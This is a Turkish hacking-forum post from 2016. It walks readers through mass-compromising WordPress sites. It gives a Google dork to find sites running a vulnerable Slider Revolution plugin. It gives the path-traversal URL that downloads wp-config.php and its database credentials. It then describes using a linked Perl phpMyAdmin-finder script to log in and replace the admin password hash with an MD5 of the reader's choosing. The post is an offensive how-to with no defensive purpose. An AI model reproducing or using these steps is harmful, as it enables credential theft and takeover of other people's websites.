Wordpress config Exploit + phpmyadminfinder scprit

Murlock NightCrawler · 6 Mar 2016

Merhaba arkadaslar bu exploiti duymussunuzdur belkide paylasilmistir ama bu configi cektik ama bunu nasil kullanacagiz ?

iste bu database bilgilerini phpmyadmin e baglanip admin sifresini degistirmek icin kullanacagiz
phpmyadmini bulmak icin sizlere mukemmel bir scprit paylasiyorum isinize yararsa ne mutlu

EXPLOIT ve Kullanimi

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"

# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox

# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

evet dorku googlede aratiyoruz

bulunan sitelerin sonuna
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
bunu yapistiriyoruz

sonra config dosyasini kaydediyoruz ve simdi ise phpmyadminfinder.pl yi calistiriyoruz

perl phpmyadmin_f1nd3r.pl

sitemizi yaziyoruz su sekilde

http://www.localhost.com/
buldugumuz zaman configteki bilgilerle giris yapip admin hash ini degistiriyoruz
bunun icin bir sifre belirleyin ve bunu md5 e cevirin kolay gelsin kullanan arkadaslara

Burdan indirDosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam

virus totalhttps://www.virustotal.com/en/file/...2d6c70307ea05307aed66651/analysis/1457231786/

Wordpress config Exploit + phpmyadminfinder scprit

Murlock NightCrawler

Yeni üye

Sosyal medya sayfalarımız